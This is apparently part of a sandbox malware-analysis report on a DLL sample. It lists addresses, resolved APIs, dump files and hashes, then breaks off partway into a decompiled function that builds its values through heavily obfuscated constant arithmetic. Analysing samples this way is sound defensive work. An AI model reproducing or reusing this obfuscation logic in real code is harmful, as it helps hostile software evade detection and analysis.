                                                                                                                                                                                      0x6e9ded38
                                                                                                                                                                                      0x6e9ded43
                                                                                                                                                                                      0x6e9ded49
                                                                                                                                                                                      0x6e9ded4b
                                                                                                                                                                                      0x6e9df011
                                                                                                                                                                                      0x6e9df02a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ded51
                                                                                                                                                                                      0x6e9ded51
                                                                                                                                                                                      0x6e9ded53
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ded53
                                                                                                                                                                                      0x6e9ded4b
                                                                                                                                                                                      0x6e9ded36
                                                                                                                                                                                      0x6e9ded0c
                                                                                                                                                                                      0x6e9de7fb
                                                                                                                                                                                      0x6e9de806
                                                                                                                                                                                      0x6e9de80c
                                                                                                                                                                                      0x6e9de80e
                                                                                                                                                                                      0x6e9defcb
                                                                                                                                                                                      0x6e9defe4
                                                                                                                                                                                      0x6e9df055
                                                                                                                                                                                      0x6e9df055
                                                                                                                                                                                      0x6e9df057
                                                                                                                                                                                      0x6e9df060
                                                                                                                                                                                      0x6e9df07c
                                                                                                                                                                                      0x6e9de814
                                                                                                                                                                                      0x6e9de814
                                                                                                                                                                                      0x6e9de816
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de816
                                                                                                                                                                                      0x6e9de80e
                                                                                                                                                                                      0x6e9de7f9
                                                                                                                                                                                      0x6e9de79f
                                                                                                                                                                                      0x6e9de7a3
                                                                                                                                                                                      0x6e9deef2
                                                                                                                                                                                      0x6e9deef2
                                                                                                                                                                                      0x6e9deef6
                                                                                                                                                                                      0x6e9deefb
                                                                                                                                                                                      0x6e9deefe
                                                                                                                                                                                      0x6e9def03
                                                                                                                                                                                      0x6e9def09
                                                                                                                                                                                      0x6e9def13
                                                                                                                                                                                      0x6e9def1d
                                                                                                                                                                                      0x6e9def27
                                                                                                                                                                                      0x6e9def43
                                                                                                                                                                                      0x6e9def45
                                                                                                                                                                                      0x6e9def46
                                                                                                                                                                                      0x6e9def52
                                                                                                                                                                                      0x6e9def54
                                                                                                                                                                                      0x6e9def57
                                                                                                                                                                                      0x6e9def57
                                                                                                                                                                                      0x6e9def57
                                                                                                                                                                                      0x6e9def57
                                                                                                                                                                                      0x6e9deefe
                                                                                                                                                                                      0x6e9def63
                                                                                                                                                                                      0x6e9def65
                                                                                                                                                                                      0x6e9def68
                                                                                                                                                                                      0x6e9def6b
                                                                                                                                                                                      0x6e9def6b
                                                                                                                                                                                      0x6e9def6b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de7a3
                                                                                                                                                                                      0x6e9de7a9
                                                                                                                                                                                      0x6e9de7a9
                                                                                                                                                                                      0x6e9de7a9
                                                                                                                                                                                      0x6e9def6e
                                                                                                                                                                                      0x6e9def74
                                                                                                                                                                                      0x6e9def82
                                                                                                                                                                                      0x6e9def82

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcAddress.KERNEL32(SymFromAddrW), ref: 6E9DE806
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6E9DE81B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressCurrentProcProcess
                                                                                                                                                                                      • String ID: SymFromAddrW$SymFromInlineContextW$SymGetLineFromAddrW64$SymGetLineFromInlineContextW$called `Option::unwrap()` on a `None` value
                                                                                                                                                                                      • API String ID: 3217270580-808744031
                                                                                                                                                                                      • Opcode ID: 5f538a6a3c93da91f28511f2d800643d599be2adaa18bce44ba791065d31b86c
                                                                                                                                                                                      • Instruction ID: 30dca7ce9b6ec1ef7a1a9b67f99e46ae3144c7aaded0bc58ee4a53d69cb60bbd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f538a6a3c93da91f28511f2d800643d599be2adaa18bce44ba791065d31b86c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 834257B0904F508FE7258F69C490BE2B7F5BF98314F10892ED59A87A50E775E48ACF81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                                                      			E003EF561(intOrPtr __ecx) {
                                                                                                                                                                                      				char _v32;
                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                      				char* _v48;
                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                      				signed int _v64;
                                                                                                                                                                                      				char _v68;
                                                                                                                                                                                      				char _v72;
                                                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                                                      				char _v80;
                                                                                                                                                                                      				char _v84;
                                                                                                                                                                                      				signed int _v88;
                                                                                                                                                                                      				signed int _v92;
                                                                                                                                                                                      				signed int _v96;
                                                                                                                                                                                      				signed int _v100;
                                                                                                                                                                                      				signed int _v104;
                                                                                                                                                                                      				signed int _v108;
                                                                                                                                                                                      				signed int _v112;
                                                                                                                                                                                      				signed int _v116;
                                                                                                                                                                                      				signed int _v120;
                                                                                                                                                                                      				signed int _v124;
                                                                                                                                                                                      				signed int _v128;
                                                                                                                                                                                      				signed int _v132;
                                                                                                                                                                                      				signed int _v136;
                                                                                                                                                                                      				signed int _v140;
                                                                                                                                                                                      				signed int _v144;
                                                                                                                                                                                      				signed int _v148;
                                                                                                                                                                                      				signed int _v152;
                                                                                                                                                                                      				signed int _v156;
                                                                                                                                                                                      				signed int _v160;
                                                                                                                                                                                      				signed int _v164;
                                                                                                                                                                                      				unsigned int _v168;
                                                                                                                                                                                      				signed int _v172;
                                                                                                                                                                                      				signed int _v176;
                                                                                                                                                                                      				signed int _v180;
                                                                                                                                                                                      				signed int _v184;
                                                                                                                                                                                      				signed int _v188;
                                                                                                                                                                                      				signed int _v192;
                                                                                                                                                                                      				signed int _v196;
                                                                                                                                                                                      				signed int _v200;
                                                                                                                                                                                      				signed int _v204;
                                                                                                                                                                                      				signed int _v208;
                                                                                                                                                                                      				signed int _v212;
                                                                                                                                                                                      				signed int _v216;
                                                                                                                                                                                      				signed int _v220;
                                                                                                                                                                                      				signed int _v224;
                                                                                                                                                                                      				signed int _v228;
                                                                                                                                                                                      				signed int _v232;
                                                                                                                                                                                      				signed int _v236;
                                                                                                                                                                                      				signed int _v240;
                                                                                                                                                                                      				signed int _v244;
                                                                                                                                                                                      				signed int _v248;
                                                                                                                                                                                      				signed int _v252;
                                                                                                                                                                                      				signed int _v256;
                                                                                                                                                                                      				signed int _v260;
                                                                                                                                                                                      				signed int _v264;
                                                                                                                                                                                      				signed int _v268;
                                                                                                                                                                                      				signed int _v272;
                                                                                                                                                                                      				signed int _v276;
                                                                                                                                                                                      				signed int _v280;
                                                                                                                                                                                      				signed int _v284;
                                                                                                                                                                                      				signed int _v288;
                                                                                                                                                                                      				signed int _v292;
                                                                                                                                                                                      				signed int _v296;
                                                                                                                                                                                      				signed int _v300;
                                                                                                                                                                                      				signed int _v304;
                                                                                                                                                                                      				signed int _v308;
                                                                                                                                                                                      				signed int _v312;
                                                                                                                                                                                      				signed int _v316;
                                                                                                                                                                                      				signed int _v320;
                                                                                                                                                                                      				signed int _v324;
                                                                                                                                                                                      				signed int _v328;
                                                                                                                                                                                      				signed int _v332;
                                                                                                                                                                                      				signed int _v336;
                                                                                                                                                                                      				signed int _v340;
                                                                                                                                                                                      				signed int _v344;
                                                                                                                                                                                      				signed int _v348;
                                                                                                                                                                                      				signed int _v352;
                                                                                                                                                                                      				signed int _v356;
                                                                                                                                                                                      				signed int _v360;
                                                                                                                                                                                      				signed int _v364;
                                                                                                                                                                                      				signed int _v368;
                                                                                                                                                                                      				signed int _v372;
                                                                                                                                                                                      				signed int _v376;
                                                                                                                                                                                      				signed int _v380;
                                                                                                                                                                                      				signed int _v384;
                                                                                                                                                                                      				signed int _v388;
                                                                                                                                                                                      				signed int _v392;
                                                                                                                                                                                      				void* _t761;
                                                                                                                                                                                      				void* _t763;
                                                                                                                                                                                      				void* _t772;
                                                                                                                                                                                      				void* _t780;
                                                                                                                                                                                      				intOrPtr _t792;
                                                                                                                                                                                      				void* _t795;
                                                                                                                                                                                      				signed int _t797;
                                                                                                                                                                                      				void* _t808;
                                                                                                                                                                                      				signed int _t814;
                                                                                                                                                                                      				signed int _t815;
                                                                                                                                                                                      				signed int _t816;
                                                                                                                                                                                      				signed int _t817;
                                                                                                                                                                                      				signed int _t818;
                                                                                                                                                                                      				signed int _t819;
                                                                                                                                                                                      				signed int _t820;
                                                                                                                                                                                      				signed int _t821;
                                                                                                                                                                                      				signed int _t822;
                                                                                                                                                                                      				signed int _t823;
                                                                                                                                                                                      				signed int _t824;
                                                                                                                                                                                      				signed int _t825;
                                                                                                                                                                                      				signed int _t826;
                                                                                                                                                                                      				signed int _t827;
                                                                                                                                                                                      				signed int _t828;
                                                                                                                                                                                      				void* _t829;
                                                                                                                                                                                      				void* _t832;
                                                                                                                                                                                      				void* _t889;
                                                                                                                                                                                      				void* _t913;
                                                                                                                                                                                      				void* _t916;
                                                                                                                                                                                      				intOrPtr _t917;
                                                                                                                                                                                      				void* _t921;
                                                                                                                                                                                      				signed int* _t923;
                                                                                                                                                                                      				void* _t925;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t923 =  &_v392;
                                                                                                                                                                                      				_v200 = 0x89ca81;
                                                                                                                                                                                      				_v200 = _v200 * 0x5d;
                                                                                                                                                                                      				_t921 = 0;
                                                                                                                                                                                      				_v200 = _v200 ^ 0xaf9dd6ae;
                                                                                                                                                                                      				_t808 = 0xf774147;
                                                                                                                                                                                      				_v200 = _v200 ^ 0xd0d10238;
                                                                                                                                                                                      				_v340 = 0x7031b3;
                                                                                                                                                                                      				_v340 = _v340 << 9;
                                                                                                                                                                                      				_v340 = _v340 + 0xdab9;
                                                                                                                                                                                      				_v76 = __ecx;
                                                                                                                                                                                      				_t814 = 0x5e;
                                                                                                                                                                                      				_v340 = _v340 / _t814;
                                                                                                                                                                                      				_v340 = _v340 ^ 0x02631bed;
                                                                                                                                                                                      				_v344 = 0x913049;
                                                                                                                                                                                      				_v344 = _v344 >> 6;
                                                                                                                                                                                      				_v344 = _v344 + 0xffffeb40;
                                                                                                                                                                                      				_v344 = _v344 >> 9;
                                                                                                                                                                                      				_v344 = _v344 ^ 0x00000118;
                                                                                                                                                                                      				_v208 = 0xd820b3;
                                                                                                                                                                                      				_t815 = 0x11;
                                                                                                                                                                                      				_v208 = _v208 * 0x75;
                                                                                                                                                                                      				_v208 = _v208 / _t815;
                                                                                                                                                                                      				_v208 = _v208 ^ 0x05cf77a2;
                                                                                                                                                                                      				_v264 = 0x2d7b5a;
                                                                                                                                                                                      				_v264 = _v264 >> 3;
                                                                                                                                                                                      				_t816 = 0x60;
                                                                                                                                                                                      				_v264 = _v264 / _t816;
                                                                                                                                                                                      				_v264 = _v264 ^ 0x00000f29;
                                                                                                                                                                                      				_v228 = 0x9ea28;
                                                                                                                                                                                      				_v228 = _v228 >> 4;
                                                                                                                                                                                      				_v228 = _v228 << 3;
                                                                                                                                                                                      				_v228 = _v228 ^ 0x0004f510;
                                                                                                                                                                                      				_v212 = 0xfc5601;
                                                                                                                                                                                      				_t817 = 0x65;
                                                                                                                                                                                      				_v212 = _v212 * 0x23;
                                                                                                                                                                                      				_v212 = _v212 ^ 0x83bd7763;
                                                                                                                                                                                      				_v212 = _v212 ^ 0xa1c2b540;
                                                                                                                                                                                      				_v216 = 0xc9f780;
                                                                                                                                                                                      				_v216 = _v216 >> 0xd;
                                                                                                                                                                                      				_v216 = _v216 << 0xa;
                                                                                                                                                                                      				_v216 = _v216 ^ 0x00193c00;
                                                                                                                                                                                      				_v100 = 0xa15ef3;
                                                                                                                                                                                      				_v100 = _v100 + 0xcfb3;
                                                                                                                                                                                      				_v100 = _v100 ^ 0x00a22ea6;
                                                                                                                                                                                      				_v128 = 0x732cc;
                                                                                                                                                                                      				_v128 = _v128 ^ 0x331cc4bd;
                                                                                                                                                                                      				_v128 = _v128 ^ 0x331bf671;
                                                                                                                                                                                      				_v260 = 0x567154;
                                                                                                                                                                                      				_v260 = _v260 + 0x98f2;
                                                                                                                                                                                      				_v260 = _v260 | 0x07205bc1;
                                                                                                                                                                                      				_v260 = _v260 ^ 0x07775bc7;
                                                                                                                                                                                      				_v296 = 0xb824e0;
                                                                                                                                                                                      				_v296 = _v296 ^ 0x4344e171;
                                                                                                                                                                                      				_v296 = _v296 << 5;
                                                                                                                                                                                      				_v296 = _v296 << 9;
                                                                                                                                                                                      				_v296 = _v296 ^ 0x31644000;
                                                                                                                                                                                      				_v392 = 0xb375bd;
                                                                                                                                                                                      				_v392 = _v392 / _t817;
                                                                                                                                                                                      				_v392 = _v392 + 0x740b;
                                                                                                                                                                                      				_v392 = _v392 ^ 0x46953f20;
                                                                                                                                                                                      				_v392 = _v392 ^ 0x469705e9;
                                                                                                                                                                                      				_v380 = 0x6f0fc1;
                                                                                                                                                                                      				_v380 = _v380 + 0x682a;
                                                                                                                                                                                      				_v380 = _v380 << 0x10;
                                                                                                                                                                                      				_t818 = 0x35;
                                                                                                                                                                                      				_v380 = _v380 / _t818;
                                                                                                                                                                                      				_v380 = _v380 ^ 0x02448a90;
                                                                                                                                                                                      				_v232 = 0xb7f463;
                                                                                                                                                                                      				_v232 = _v232 >> 2;
                                                                                                                                                                                      				_t819 = 0x16;
                                                                                                                                                                                      				_v232 = _v232 / _t819;
                                                                                                                                                                                      				_v232 = _v232 ^ 0x000b0aa6;
                                                                                                                                                                                      				_v184 = 0x1e2afb;
                                                                                                                                                                                      				_v184 = _v184 << 1;
                                                                                                                                                                                      				_v184 = _v184 ^ 0x0039344d;
                                                                                                                                                                                      				_v272 = 0xd60a24;
                                                                                                                                                                                      				_v272 = _v272 >> 0x10;
                                                                                                                                                                                      				_v272 = _v272 << 8;
                                                                                                                                                                                      				_v272 = _v272 ^ 0x0007d834;
                                                                                                                                                                                      				_v88 = 0xccda6;
                                                                                                                                                                                      				_v88 = _v88 | 0xd009f965;
                                                                                                                                                                                      				_v88 = _v88 ^ 0xd00eb16a;
                                                                                                                                                                                      				_v160 = 0x116f8;
                                                                                                                                                                                      				_v160 = _v160 << 1;
                                                                                                                                                                                      				_v160 = _v160 ^ 0x00010446;
                                                                                                                                                                                      				_v332 = 0xe14840;
                                                                                                                                                                                      				_v332 = _v332 + 0xe9af;
                                                                                                                                                                                      				_v332 = _v332 << 5;
                                                                                                                                                                                      				_t820 = 0x52;
                                                                                                                                                                                      				_v332 = _v332 * 5;
                                                                                                                                                                                      				_v332 = _v332 ^ 0x8d5f04ba;
                                                                                                                                                                                      				_v112 = 0x9b5594;
                                                                                                                                                                                      				_v112 = _v112 + 0x8c2;
                                                                                                                                                                                      				_v112 = _v112 ^ 0x009353c4;
                                                                                                                                                                                      				_v152 = 0xaad272;
                                                                                                                                                                                      				_v152 = _v152 + 0xa340;
                                                                                                                                                                                      				_v152 = _v152 ^ 0x00a74a81;
                                                                                                                                                                                      				_v224 = 0xfde353;
                                                                                                                                                                                      				_v224 = _v224 >> 0xd;
                                                                                                                                                                                      				_v224 = _v224 * 0x71;
                                                                                                                                                                                      				_v224 = _v224 ^ 0x0000f406;
                                                                                                                                                                                      				_v372 = 0x10fd3f;
                                                                                                                                                                                      				_v372 = _v372 / _t820;
                                                                                                                                                                                      				_v372 = _v372 * 0x26;
                                                                                                                                                                                      				_v372 = _v372 ^ 0x900c513e;
                                                                                                                                                                                      				_v372 = _v372 ^ 0x9009d373;
                                                                                                                                                                                      				_v192 = 0x9bc28f;
                                                                                                                                                                                      				_v192 = _v192 ^ 0x8daa98a9;
                                                                                                                                                                                      				_v192 = _v192 >> 2;
                                                                                                                                                                                      				_v192 = _v192 ^ 0x234acdcf;
                                                                                                                                                                                      				_v256 = 0x6a542c;
                                                                                                                                                                                      				_v256 = _v256 << 6;
                                                                                                                                                                                      				_v256 = _v256 + 0xcf70;
                                                                                                                                                                                      				_v256 = _v256 ^ 0x1a90167c;
                                                                                                                                                                                      				_v308 = 0xb0ac3a;
                                                                                                                                                                                      				_v308 = _v308 + 0xffff0ba4;
                                                                                                                                                                                      				_v308 = _v308 >> 7;
                                                                                                                                                                                      				_v308 = _v308 ^ 0x7a292cfc;
                                                                                                                                                                                      				_v308 = _v308 ^ 0x7a298d34;
                                                                                                                                                                                      				_v352 = 0x7fa15;
                                                                                                                                                                                      				_v352 = _v352 << 8;
                                                                                                                                                                                      				_v352 = _v352 + 0x42c8;
                                                                                                                                                                                      				_v352 = _v352 ^ 0x420546d7;
                                                                                                                                                                                      				_v352 = _v352 ^ 0x45f279ac;
                                                                                                                                                                                      				_v172 = 0x3c10dc;
                                                                                                                                                                                      				_v172 = _v172 + 0x934c;
                                                                                                                                                                                      				_v172 = _v172 ^ 0x003c5902;
                                                                                                                                                                                      				_v252 = 0x8e9148;
                                                                                                                                                                                      				_t821 = 0x3d;
                                                                                                                                                                                      				_v252 = _v252 * 0x15;
                                                                                                                                                                                      				_v252 = _v252 >> 8;
                                                                                                                                                                                      				_v252 = _v252 ^ 0x0000fb60;
                                                                                                                                                                                      				_v164 = 0x57b7bf;
                                                                                                                                                                                      				_v164 = _v164 * 0x65;
                                                                                                                                                                                      				_v164 = _v164 ^ 0x2299a995;
                                                                                                                                                                                      				_v336 = 0xdc0eaf;
                                                                                                                                                                                      				_v336 = _v336 << 3;
                                                                                                                                                                                      				_v336 = _v336 + 0xdead;
                                                                                                                                                                                      				_v336 = _v336 + 0x5890;
                                                                                                                                                                                      				_v336 = _v336 ^ 0x06efbc16;
                                                                                                                                                                                      				_v148 = 0x5f891c;
                                                                                                                                                                                      				_v148 = _v148 + 0xe952;
                                                                                                                                                                                      				_v148 = _v148 ^ 0x00699f2d;
                                                                                                                                                                                      				_v156 = 0xb9bdf1;
                                                                                                                                                                                      				_v156 = _v156 * 0x30;
                                                                                                                                                                                      				_v156 = _v156 ^ 0x22d92b94;
                                                                                                                                                                                      				_v328 = 0xdd275a;
                                                                                                                                                                                      				_v328 = _v328 ^ 0xf9c8fd87;
                                                                                                                                                                                      				_v328 = _v328 | 0xb4ffffed;
                                                                                                                                                                                      				_v328 = _v328 ^ 0xfdf2704c;
                                                                                                                                                                                      				_v220 = 0xdc69da;
                                                                                                                                                                                      				_v220 = _v220 / _t821;
                                                                                                                                                                                      				_v220 = _v220 ^ 0xf70c1774;
                                                                                                                                                                                      				_v220 = _v220 ^ 0xf706e836;
                                                                                                                                                                                      				_v236 = 0xe3f700;
                                                                                                                                                                                      				_v236 = _v236 << 6;
                                                                                                                                                                                      				_v236 = _v236 | 0x5d8b8659;
                                                                                                                                                                                      				_v236 = _v236 ^ 0x7dfec952;
                                                                                                                                                                                      				_v132 = 0xe887ef;
                                                                                                                                                                                      				_t822 = 7;
                                                                                                                                                                                      				_v132 = _v132 / _t822;
                                                                                                                                                                                      				_v132 = _v132 ^ 0x0024c858;
                                                                                                                                                                                      				_v140 = 0xc58056;
                                                                                                                                                                                      				_v140 = _v140 >> 5;
                                                                                                                                                                                      				_v140 = _v140 ^ 0x0004a47e;
                                                                                                                                                                                      				_v244 = 0x7835a9;
                                                                                                                                                                                      				_v244 = _v244 >> 5;
                                                                                                                                                                                      				_v244 = _v244 + 0xffff434e;
                                                                                                                                                                                      				_v244 = _v244 ^ 0x000b19d5;
                                                                                                                                                                                      				_v124 = 0x628bac;
                                                                                                                                                                                      				_v124 = _v124 >> 0x10;
                                                                                                                                                                                      				_v124 = _v124 ^ 0x000d99ba;
                                                                                                                                                                                      				_v196 = 0x3c4d43;
                                                                                                                                                                                      				_v196 = _v196 << 0xe;
                                                                                                                                                                                      				_v196 = _v196 ^ 0x3d5f35f5;
                                                                                                                                                                                      				_v196 = _v196 ^ 0x2e03dce1;
                                                                                                                                                                                      				_v204 = 0x3d8ce2;
                                                                                                                                                                                      				_v204 = _v204 + 0x9c91;
                                                                                                                                                                                      				_v204 = _v204 ^ 0x7a1df218;
                                                                                                                                                                                      				_v204 = _v204 ^ 0x7a210bc9;
                                                                                                                                                                                      				_v188 = 0x2b0ddf;
                                                                                                                                                                                      				_v188 = _v188 >> 0xe;
                                                                                                                                                                                      				_v188 = _v188 >> 0xf;
                                                                                                                                                                                      				_v188 = _v188 ^ 0x00037781;
                                                                                                                                                                                      				_v312 = 0x266488;
                                                                                                                                                                                      				_t823 = 0x3c;
                                                                                                                                                                                      				_v312 = _v312 / _t823;
                                                                                                                                                                                      				_v312 = _v312 >> 2;
                                                                                                                                                                                      				_v312 = _v312 + 0xffff0572;
                                                                                                                                                                                      				_v312 = _v312 ^ 0xffff9b33;
                                                                                                                                                                                      				_v320 = 0xbcf7b8;
                                                                                                                                                                                      				_t824 = 0x39;
                                                                                                                                                                                      				_v320 = _v320 * 0x6b;
                                                                                                                                                                                      				_v320 = _v320 * 0x26;
                                                                                                                                                                                      				_v320 = _v320 / _t824;
                                                                                                                                                                                      				_v320 = _v320 ^ 0x034e55e7;
                                                                                                                                                                                      				_v364 = 0xfcda34;
                                                                                                                                                                                      				_v364 = _v364 + 0xdb03;
                                                                                                                                                                                      				_v364 = _v364 >> 6;
                                                                                                                                                                                      				_v364 = _v364 + 0xabad;
                                                                                                                                                                                      				_v364 = _v364 ^ 0x000f61ab;
                                                                                                                                                                                      				_v92 = 0x2a2b0e;
                                                                                                                                                                                      				_v92 = _v92 + 0x4979;
                                                                                                                                                                                      				_v92 = _v92 ^ 0x0021c920;
                                                                                                                                                                                      				_v144 = 0xa1e216;
                                                                                                                                                                                      				_v144 = _v144 + 0xffff5ff5;
                                                                                                                                                                                      				_v144 = _v144 ^ 0x00ad0a84;
                                                                                                                                                                                      				_v356 = 0xcae231;
                                                                                                                                                                                      				_v356 = _v356 >> 0xc;
                                                                                                                                                                                      				_v356 = _v356 | 0xfd8e10ca;
                                                                                                                                                                                      				_t825 = 0x72;
                                                                                                                                                                                      				_v356 = _v356 * 0x5c;
                                                                                                                                                                                      				_v356 = _v356 ^ 0x1f1c568f;
                                                                                                                                                                                      				_v324 = 0x253eae;
                                                                                                                                                                                      				_v324 = _v324 >> 2;
                                                                                                                                                                                      				_v324 = _v324 | 0xf8fd8aec;
                                                                                                                                                                                      				_v324 = _v324 + 0x754e;
                                                                                                                                                                                      				_v324 = _v324 ^ 0xf8f18caa;
                                                                                                                                                                                      				_v240 = 0xb94b94;
                                                                                                                                                                                      				_v240 = _v240 + 0xffff03b1;
                                                                                                                                                                                      				_v240 = _v240 + 0xc1ea;
                                                                                                                                                                                      				_v240 = _v240 ^ 0x00b636b6;
                                                                                                                                                                                      				_v248 = 0x665da;
                                                                                                                                                                                      				_v248 = _v248 / _t825;
                                                                                                                                                                                      				_v248 = _v248 ^ 0xe7146895;
                                                                                                                                                                                      				_v248 = _v248 ^ 0xe71d8416;
                                                                                                                                                                                      				_v136 = 0xf03201;
                                                                                                                                                                                      				_v136 = _v136 | 0x16662734;
                                                                                                                                                                                      				_v136 = _v136 ^ 0x16f8276c;
                                                                                                                                                                                      				_v348 = 0xf58dc;
                                                                                                                                                                                      				_v348 = _v348 | 0xcefb25f5;
                                                                                                                                                                                      				_v348 = _v348 ^ 0xb79d248d;
                                                                                                                                                                                      				_v348 = _v348 * 5;
                                                                                                                                                                                      				_v348 = _v348 ^ 0x5ee99df0;
                                                                                                                                                                                      				_v292 = 0x1bda;
                                                                                                                                                                                      				_v292 = _v292 ^ 0xf0c300cc;
                                                                                                                                                                                      				_v292 = _v292 | 0x62eaa242;
                                                                                                                                                                                      				_v292 = _v292 ^ 0x0fb5f6bf;
                                                                                                                                                                                      				_v292 = _v292 ^ 0xfd545b0a;
                                                                                                                                                                                      				_v388 = 0x7e987;
                                                                                                                                                                                      				_v388 = _v388 | 0xe51d24f3;
                                                                                                                                                                                      				_v388 = _v388 << 1;
                                                                                                                                                                                      				_v388 = _v388 | 0xd459dc12;
                                                                                                                                                                                      				_v388 = _v388 ^ 0xde72c5d1;
                                                                                                                                                                                      				_v168 = 0x6f1542;
                                                                                                                                                                                      				_v168 = _v168 >> 0xb;
                                                                                                                                                                                      				_v168 = _v168 ^ 0x00095e82;
                                                                                                                                                                                      				_v316 = 0xeb0c05;
                                                                                                                                                                                      				_v316 = _v316 * 0x34;
                                                                                                                                                                                      				_v316 = _v316 ^ 0x9a011e6d;
                                                                                                                                                                                      				_v316 = _v316 + 0xffffdd41;
                                                                                                                                                                                      				_v316 = _v316 ^ 0xb5bd4b4c;
                                                                                                                                                                                      				_v108 = 0x4384da;
                                                                                                                                                                                      				_v108 = _v108 << 7;
                                                                                                                                                                                      				_v108 = _v108 ^ 0x21ca9036;
                                                                                                                                                                                      				_v376 = 0x26f029;
                                                                                                                                                                                      				_v376 = _v376 | 0x5c3fc44f;
                                                                                                                                                                                      				_v376 = _v376 * 0x5e;
                                                                                                                                                                                      				_v376 = _v376 << 0xa;
                                                                                                                                                                                      				_v376 = _v376 ^ 0xef0e7155;
                                                                                                                                                                                      				_v120 = 0xfb00c8;
                                                                                                                                                                                      				_t826 = 0x70;
                                                                                                                                                                                      				_v120 = _v120 / _t826;
                                                                                                                                                                                      				_v120 = _v120 ^ 0x0007bcc6;
                                                                                                                                                                                      				_v104 = 0x83a54a;
                                                                                                                                                                                      				_v104 = _v104 + 0xffff432b;
                                                                                                                                                                                      				_v104 = _v104 ^ 0x008e71dd;
                                                                                                                                                                                      				_v384 = 0x2ff4f3;
                                                                                                                                                                                      				_v384 = _v384 | 0xd0f2a060;
                                                                                                                                                                                      				_v384 = _v384 << 0xc;
                                                                                                                                                                                      				_t827 = 0x63;
                                                                                                                                                                                      				_v384 = _v384 * 0x15;
                                                                                                                                                                                      				_v384 = _v384 ^ 0xf17b8b1a;
                                                                                                                                                                                      				_v284 = 0x7bc7d6;
                                                                                                                                                                                      				_v284 = _v284 | 0xfb469b5d;
                                                                                                                                                                                      				_v284 = _v284 >> 0x10;
                                                                                                                                                                                      				_v284 = _v284 ^ 0x000029d1;
                                                                                                                                                                                      				_v276 = 0xc7b492;
                                                                                                                                                                                      				_v276 = _v276 ^ 0xda7fe355;
                                                                                                                                                                                      				_v276 = _v276 ^ 0xf789276a;
                                                                                                                                                                                      				_v276 = _v276 ^ 0x2d34b316;
                                                                                                                                                                                      				_v280 = 0xc4b066;
                                                                                                                                                                                      				_v280 = _v280 + 0x2d4a;
                                                                                                                                                                                      				_v280 = _v280 ^ 0x79b35fac;
                                                                                                                                                                                      				_v280 = _v280 ^ 0x79759ff7;
                                                                                                                                                                                      				_v360 = 0x6bdb51;
                                                                                                                                                                                      				_v360 = _v360 << 4;
                                                                                                                                                                                      				_v360 = _v360 >> 7;
                                                                                                                                                                                      				_v360 = _v360 / _t827;
                                                                                                                                                                                      				_v360 = _v360 ^ 0x0009f0c5;
                                                                                                                                                                                      				_v180 = 0xdedf2a;
                                                                                                                                                                                      				_t828 = 0x4a;
                                                                                                                                                                                      				_v180 = _v180 * 0x51;
                                                                                                                                                                                      				_v180 = _v180 ^ 0x46824d47;
                                                                                                                                                                                      				_v368 = 0xc3e69e;
                                                                                                                                                                                      				_v368 = _v368 + 0xffff984d;
                                                                                                                                                                                      				_v368 = _v368 * 0x6d;
                                                                                                                                                                                      				_v368 = _v368 * 0x79;
                                                                                                                                                                                      				_v368 = _v368 ^ 0x57d87162;
                                                                                                                                                                                      				_v300 = 0x54bd4a;
                                                                                                                                                                                      				_v300 = _v300 | 0xb63244a0;
                                                                                                                                                                                      				_v300 = _v300 + 0x417e;
                                                                                                                                                                                      				_v300 = _v300 | 0x63a11be6;
                                                                                                                                                                                      				_v300 = _v300 ^ 0xf7f931f3;
                                                                                                                                                                                      				_v268 = 0xbea848;
                                                                                                                                                                                      				_v268 = _v268 >> 9;
                                                                                                                                                                                      				_v268 = _v268 | 0x5eb62668;
                                                                                                                                                                                      				_v268 = _v268 ^ 0x5eb9ee94;
                                                                                                                                                                                      				_v96 = 0x440258;
                                                                                                                                                                                      				_v96 = _v96 >> 0x10;
                                                                                                                                                                                      				_v96 = _v96 ^ 0x0009723b;
                                                                                                                                                                                      				_v176 = 0x3b19f4;
                                                                                                                                                                                      				_v176 = _v176 / _t828;
                                                                                                                                                                                      				_v176 = _v176 ^ 0x0001c2c1;
                                                                                                                                                                                      				_v116 = 0x144365;
                                                                                                                                                                                      				_v116 = _v116 | 0x65ecb7a2;
                                                                                                                                                                                      				_v116 = _v116 ^ 0x65f0ee99;
                                                                                                                                                                                      				_v288 = 0xea5434;
                                                                                                                                                                                      				_v288 = _v288 >> 1;
                                                                                                                                                                                      				_v288 = _v288 | 0xb6140203;
                                                                                                                                                                                      				_v288 = _v288 >> 9;
